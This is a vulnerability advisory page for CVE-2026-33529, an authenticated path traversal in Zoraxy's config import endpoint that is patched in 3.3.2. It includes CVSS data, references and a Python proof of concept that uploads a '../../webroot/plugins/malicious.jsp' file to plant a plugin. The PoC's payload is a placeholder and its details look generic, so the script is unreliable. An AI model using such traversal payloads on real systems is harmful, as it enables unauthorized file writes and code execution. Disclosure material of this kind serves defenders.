Security Vulnerability Report
中文
CVE-2026-33529 CVSS 3.3 LOW

CVE-2026-33529

Published: 2026-03-26 20:16:15
Last Modified: 2026-04-02 18:13:04

Description

Zoraxy is a general purpose HTTP reverse proxy and forwarding tool. Prior to version 3.3.2, an authenticated path traversal vulnerability in the configuration import endpoint allows an authenticated user to write arbitrary files outside the config directory, which can lead to RCE by creating a plugin. Version 3.3.2 patches the issue.

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:zoraxy:zoraxy:*:*:*:*:*:*:*:* - VULNERABLE
Zoraxy < 3.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (example) target_url = "http://target-ip:port/api/config/import" # Attacker's session cookie (requires High Privilege) cookies = {'zoraxy-auth': 'admin_session_cookie_here'} # Malicious payload content plugin_content = "<% code to execute RCE %>" # Path traversal payload to write outside config dir files = { 'file': ('../../webroot/plugins/malicious.jsp', plugin_content, 'application/octet-stream') } response = requests.post(target_url, cookies=cookies, files=files) if response.status_code == 200: print("[+] PoC executed successfully. Check if file was written.") else: print(f"[-] Failed. Status: {response.status_code}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33529", "sourceIdentifier": "[email protected]", "published": "2026-03-26T20:16:15.070", "lastModified": "2026-04-02T18:13:03.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zoraxy is a general purpose HTTP reverse proxy and forwarding tool. Prior to version 3.3.2, an authenticated path traversal vulnerability in the configuration import endpoint allows an authenticated user to write arbitrary files outside the config directory, which can lead to RCE by creating a plugin. Version 3.3.2 patches the issue."}, {"lang": "es", "value": "Zoraxy es una herramienta de proxy inverso HTTP y reenvío de propósito general. Antes de la versión 3.3.2, una vulnerabilidad de salto de ruta autenticado en el endpoint de importación de configuración permite a un usuario autenticado escribir archivos arbitrarios fuera del directorio de configuración, lo que puede llevar a RCE mediante la creación de un plugin. La versión 3.3.2 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.7, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zoraxy:zoraxy:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.3.2", "matchCriteriaId": "53E3D478-D37C-4CC6-96FF-381A55956C57"}]}]}], "references": [{"url": "https://github.com/tobychui/zoraxy/commit/69ac755aeec5d15ba4c62099f7f1ed77a855b40b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/tobychui/zoraxy/releases/tag/v3.3.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/tobychui/zoraxy/security/advisories/GHSA-7pq3-326h-f8q9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}